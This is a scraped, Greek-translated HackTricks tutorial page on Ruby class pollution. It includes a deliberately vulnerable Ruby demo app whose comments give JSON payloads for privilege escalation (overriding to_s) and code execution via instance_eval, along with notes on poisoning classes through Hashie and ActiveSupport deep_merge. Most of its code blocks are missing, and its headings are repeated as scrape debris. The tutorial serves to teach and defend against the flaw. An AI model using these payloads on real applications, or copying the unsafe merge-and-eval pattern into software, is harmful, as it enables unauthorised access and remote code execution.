Ruby Class Pollution

Learn & practice AWS Hacking: Learn & practice GCP Hacking:

Support HackTricks

Check the !
Join the 💬 or the or follow us on Twitter 🐦 .
Share hacking tricks by submitting PRs to the and github repos.

Αυτή είναι μια περίληψη από την ανάρτηση

Merge on Attributes

Παράδειγμα:

Εξήγηση

Privilege Escalation: Η μέθοδος authorize ελέγχει αν το to_s επιστρέφει "Admin." Με την εισαγωγή ενός νέου χαρακτηριστικού to_s μέσω JSON, ένας επιτιθέμενος μπορεί να κάνει τη μέθοδο to_s να επιστρέφει "Admin," παρέχοντας μη εξουσιοδοτημένα προνόμια.
Remote Code Execution: Στο health_check, το instance_eval εκτελεί μεθόδους που αναφέρονται στα protected_methods. Αν ένας επιτιθέμενος εισάγει προσαρμοσμένα ονόματα μεθόδων (όπως το "puts 1"), το instance_eval θα το εκτελέσει, οδηγώντας σε remote code execution (RCE).
Αυτό είναι δυνατό μόνο επειδή υπάρχει μια ευάλωτη εντολή eval που εκτελεί την τιμή της συμβολοσειράς αυτού του χαρακτηριστικού.
Περιορισμός Επιπτώσεων: Αυτή η ευπάθεια επηρεάζει μόνο μεμονωμένα παραδείγματα, αφήνοντας άλλα παραδείγματα του User και του Admin ανεπηρέαστα, περιορίζοντας έτσι την έκταση της εκμετάλλευσης.

Πραγματικές Περιπτώσεις

ActiveSupport’s `deep_merge`

Αυτό δεν είναι ευάλωτο από προεπιλογή αλλά μπορεί να γίνει ευάλωτο με κάτι όπως:

Hashie’s `deep_merge`

Η μέθοδος deep_merge του Hashie λειτουργεί απευθείας σε χαρακτηριστικά αντικειμένων αντί για απλές καταχωρήσεις. Αποτρέπει την αντικατάσταση μεθόδων με χαρακτηριστικά σε μια συγχώνευση με κάποιες εξαιρέσεις: χαρακτηριστικά που τελειώνουν με _, !, ή ? μπορούν ακόμα να συγχωνευτούν στο αντικείμενο.

Μια ειδική περίπτωση είναι το χαρακτηριστικό _ από μόνο του. Απλά το _ είναι ένα χαρακτηριστικό που συνήθως επιστρέφει ένα Mash αντικείμενο. Και επειδή είναι μέρος των εξαιρέσεων, είναι δυνατόν να τροποποιηθεί.

Δείτε το παρακάτω παράδειγμα πώς η παράδοση {"_": "Admin"} επιτρέπει την παράκαμψη του _.to_s == "Admin":

Poison the Classes

Στο παρακάτω παράδειγμα είναι δυνατόν να βρείτε την κλάση Person, και τις κλάσεις Admin και Regular που κληρονομούν από την κλάση Person. Έχει επίσης μια άλλη κλάση που ονομάζεται KeySigner:

Poison Parent Class

Με αυτό το payload:

Είναι δυνατόν να τροποποιηθεί η τιμή του χαρακτηριστικού @@url της γονικής κλάσης Person.

Μολύνοντας Άλλες Κλάσεις

Με αυτό το payload:

Είναι δυνατόν να γίνει brute-force στις καθορισμένες κλάσεις και σε κάποιο σημείο να δηλητηριαστεί η κλάση KeySigner τροποποιώντας την τιμή του signing_key σε injected-signing-key.\

Αναφορές

Υποστήριξη HackTricks

PreviousJNDI - Java Naming and Directory Interface & Log4Shell NextDomain/Subdomain takeover

Last updated 15 days ago

# Code from https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html # Comments added to exploit the merge on attributes require 'json' # Base class for both Admin and Regular users class Person attr_accessor :name, :age, :details def initialize(name:, age:, details:) @name = name @age = age @details = details end # Method to merge additional data into the object def merge_with(additional) recursive_merge(self, additional) end # Authorize based on the `to_s` method result def authorize if to_s == "Admin" puts "Access granted: #{@name} is an admin." else puts "Access denied: #{@name} is not an admin." end end # Health check that executes all protected methods using `instance_eval` def health_check protected_methods().each do |method| instance_eval(method.to_s) end end private # VULNERABLE FUNCTION that can be abused to merge attributes def recursive_merge(original, additional, current_obj = original) additional.each do |key, value| if value.is_a?(Hash) if current_obj.respond_to?(key) next_obj = current_obj.public_send(key) recursive_merge(original, value, next_obj) else new_object = Object.new current_obj.instance_variable_set("@#{key}", new_object) current_obj.singleton_class.attr_accessor key end else current_obj.instance_variable_set("@#{key}", value) current_obj.singleton_class.attr_accessor key end end original end protected def check_cpu puts "CPU check passed." end def check_memory puts "Memory check passed." end end # Admin class inherits from Person class Admin < Person def initialize(name:, age:, details:) super(name: name, age: age, details: details) end def to_s "Admin" end end # Regular user class inherits from Person class User < Person def initialize(name:, age:, details:) super(name: name, age: age, details: details) end def to_s "User" end end class JSONMergerApp def self.run(json_input) additional_object = JSON.parse(json_input) # Instantiate a regular user user = User.new( name: "John Doe", age: 30, details: { "occupation" => "Engineer", "location" => { "city" => "Madrid", "country" => "Spain" } } ) # Perform a recursive merge, which could override methods user.merge_with(additional_object) # Authorize the user (privilege escalation vulnerability) # ruby class_pollution.rb '{"to_s":"Admin","name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}' user.authorize # Execute health check (RCE vulnerability) # ruby class_pollution.rb '{"protected_methods":["puts 1"],"name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}' user.health_check end end if ARGV.length != 1 puts "Usage: ruby class_pollution.rb 'JSON_STRING'" exit end json_input = ARGV[0] JSONMergerApp.run(json_input)

Merge on Attributes

Εξήγηση

Πραγματικές Περιπτώσεις

ActiveSupport’s deep_merge

Hashie’s deep_merge

Poison the Classes

Poison Parent Class

Μολύνοντας Άλλες Κλάσεις

Αναφορές

Merge on Attributes

Εξήγηση

Πραγματικές Περιπτώσεις

ActiveSupport’s deep_merge

Hashie’s deep_merge

Poison the Classes

Poison Parent Class

Μολύνοντας Άλλες Κλάσεις

Αναφορές

ActiveSupport’s `deep_merge`

Hashie’s `deep_merge`

ActiveSupport’s `deep_merge`

Hashie’s `deep_merge`